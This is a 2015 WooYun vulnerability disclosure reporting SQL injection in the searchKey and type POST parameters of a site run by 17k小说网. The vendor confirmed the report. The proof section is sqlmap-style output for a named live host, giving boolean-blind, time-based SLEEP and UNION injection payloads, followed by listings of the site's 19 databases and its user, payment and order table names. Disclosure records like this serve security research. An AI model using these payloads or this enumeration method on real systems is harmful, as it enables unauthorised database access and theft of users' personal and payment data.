当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152968

漏洞标题:17k小说网旗下某网站存在SQL注入

相关厂商:17k小说网

漏洞作者: 路人甲

提交时间:2015-11-09 12:27

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-20: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向核心白帽子及相关领域专家公开
2015-12-10: 细节向普通白帽子公开
2015-12-20: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

当里个当

详细说明:

2个参数存在问题,涉及用户 和 订单信息。
http://ssqj.qiye.ikanshu.cn:80/org!docList.xhtml (POST)
qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a

漏洞证明:

---
Parameter: searchKey (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment)
Payload: qiyeId=4&searchKey=-2528' OR 6910=6910-- &type=a
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' AND (SELECT * FROM (SELECT(SLEEP(5)))jlmU) AND 'dAHT'='dAHT&type=a
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x417374516e5252617277,0x716b6b7671),NULL,NULL,NULL,NULL,NULL-- &type=a
Parameter: type (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=-4978' OR 1187=1187 AND 'YbYk'='YbYk
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' AND (SELECT * FROM (SELECT(SLEEP(5)))svjD) AND 'IibS'='IibS
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: qiyeId=4&searchKey=%e8%af%b7%e8%be%93%e5%85%a5%e6%90%9c%e7%b4%a2%e5%86%85%e5%ae%b9&type=a' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176767a71,0x51476f7a43645044546b,0x716b6b7671),NULL,NULL,NULL,NULL,NULL#
---
back-end DBMS: MySQL 5.0.12
current user: 'yanwp@%'
current user is DBA: False
available databases [19]:
[*] ads
[*] banquan
[*] ca_web_pay
[*] cdps
[*] client_user_center
[*] desay
[*] information_schema
[*] qiye
[*] resource_auth
[*] resource_process
[*] skymobi_1
[*] skymobi_2
[*] skymobi_3
[*] skymobi_4
[*] skymobi_5
[*] test
[*] wap_17k
[*] xinhua
[*] zentaotask
Database: client_user_center
[73 tables]
+------------------------+
| user |
| alipay_order |
| alipay_response |
| alipaylog |
| bind_repay |
| cash_coupon |
| center_alipay_order |
| center_alipay_response |
| channel |
| channel_info |
| channel_info_history |
| channel_order |
| cmcc |
| data_statistic_base |
| exchange_code |
| exchange_code_rule |
| heartbeat |
| hj_order |
| hj_response |
| huafubao_order |
| huawei_log |
| huawei_order |
| mm_order |
| mobilepayorder |
| pay360_order |
| pay360_response |
| pp_order |
| pp_response |
| rdo_order |
| rdo_response |
| rdopay_product |
| recharge_amount |
| recharge_repay |
| sky_order |
| sky_response |
| sm_imei |
| unipay_order |
| unipay_response |
| user_append |
| user_award |
| user_bk |
| user_book_note |
| user_cash_coupon |
| user_cash_coupon_log |
| user_client |
| user_daoju |
| user_dashang |
| user_fav_mark |
| user_hd |
| user_invalid_message |
| user_message |
| user_notice |
| user_pay_before |
| user_qq |
| user_third |
| user_token_history |
| user_uuid |
| user_vip |
| user_vip_gift |
| user_vip_log |
| user_weibo |
| user_yuepiao |
| user_yuepiao_log |
| useramount |
| useramount_delinfo |
| useramountlog |
| userprop |
| userscore |
| userscorelog |
| wap_channel |
| wap_manager |
| weixin_order |
| weixin_response |
+------------------------+
Database: wap_17k
[14 tables]
+--------------------+
| user |
| adminuser |
| bookcomment |
| cmsbook |
| cmscategory |
| feedback |
| paylog |
| room_msg |
| useramount |
| useramountlog |
| userbookchapterlog |
| userbookmark |
| yeepayorder |
| yeepayresponse |
+--------------------+

修复方案:

~~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-20 13:20

厂商回复:

十分感谢您对17K网站的关注,祝您工作愉快!

最新状态:

暂无


漏洞评价:

评价